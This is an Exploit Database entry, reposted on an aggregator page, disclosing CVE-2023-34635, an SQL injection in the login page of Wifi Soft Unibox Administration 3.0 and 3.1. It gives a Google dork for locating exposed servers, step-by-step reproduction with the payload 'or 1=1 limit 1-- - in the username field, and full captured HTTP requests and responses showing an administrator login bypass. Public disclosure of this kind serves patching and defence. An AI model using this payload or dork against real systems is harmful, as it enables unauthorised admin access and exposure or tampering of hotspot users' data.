Wifi Soft Unibox Administration 3.0 & 3.1 – SQL Injection

• Exploit Database
• 16 阅读

• 作者： Ansh Jain
  日期： 2023-07-20
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51610/

• # Exploit Title: Wifi Soft Unibox Administration 3.0 & 3.1 Login Page - Sql Injection
  # Google Dork: intext:"Unibox Administration 3.1", intext:"Unibox 3.0"
  # Date: 07/2023
  # Exploit Author: Ansh Jain @sudoark
  # AuthorContact : arkinux01@gmail.com
  # Vendor Homepage: https://www.wifi-soft.com/
  # Software Link:
  https://www.wifi-soft.com/products/unibox-hotspot-controller.php
  # Version: Unibox Administration 3.0 & 3.1
  # Tested on: Microsoft Windows 11
  # CVE : CVE-2023-34635
  # CVE URL : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34635
  
  The Wifi Soft Unibox Administration 3.0 and 3.1 Login Page is vulnerable to
  SQL Injection, which can lead to unauthorised admin access for attackers.
  The vulnerability occurs because of not validating or sanitising the user
  input in the username field of the login page and directly sending the
  input to the backend server and database.
  
  ## How to Reproduce
  Step 1 : Visit the login page and check the version, whether it is 3.0,
  3.1, or not.
  Step 2 : Add this payload " 'or 1=1 limit 1-- - " to the username field and
  enter any random password.
  Step 3 : Fill in the captcha and hit login. After hitting login, you have
  been successfully logged in as an administrator and can see anyone's user
  data, modify data, revoke access, etc.
  
  
  --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  ### Login Request
  --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  
  -----------------------------------------------------------------------------------------------------------------------
  Parameters: username, password, captcha, action
  -----------------------------------------------------------------------------------------------------------------------
  
  POST /index.php HTTP/2
  Host: 255.255.255.255.host.com
  Cookie: PHPSESSID=rfds9jjjbu7jorb9kgjsko858d
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101
  Firefox/102.0
  Accept:
  text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 83
  Origin: https://255.255.255.255.host.com
  Referer: https://255.255.255.255.host.com/index.php
  Upgrade-Insecure-Requests: 1
  Sec-Fetch-Dest: document
  Sec-Fetch-Mode: navigate
  Sec-Fetch-Site: same-origin
  Sec-Fetch-User: ?1
  Te: trailers
  
  username='or+1=1+limit+1--+-&password=randompassword&captcha=69199&action=Login
  
  --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  ### Login Response
  --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  
  HTTP/2 302 Found
  Server: nginx
  Date: Tue, 18 Jul 2023 13:32:14 GMT
  Content-Type: text/html; charset=UTF-8
  Location: ./dashboard/dashboard
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate
  Pragma: no-cache
  
  --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  ### Successful Loggedin Request
  --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  
  GET /dashboard/dashboard HTTP/2
  Host: 255.255.255.255.host.com
  Cookie: PHPSESSID=rfds9jjjbu7jorb9kgjsko858d
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101
  Firefox/102.0
  Accept:
  text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Referer: https://255.255.255.255.host.com/index.php
  Upgrade-Insecure-Requests: 1
  Sec-Fetch-Dest: document
  Sec-Fetch-Mode: navigate
  Sec-Fetch-Site: same-origin
  Sec-Fetch-User: ?1
  Te: trailers
  
  --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  ### Successful Loggedin Response
  --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  
  HTTP/2 200 OK
  Server: nginx
  Date: Tue, 18 Jul 2023 13:32:43 GMT
  Content-Type: text/html; charset=UTF-8
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate
  Pragma: no-cache
  Cache_control: private
  
  
  <!DOCTYPE html>
  <html lang="en">
  html content
  </html>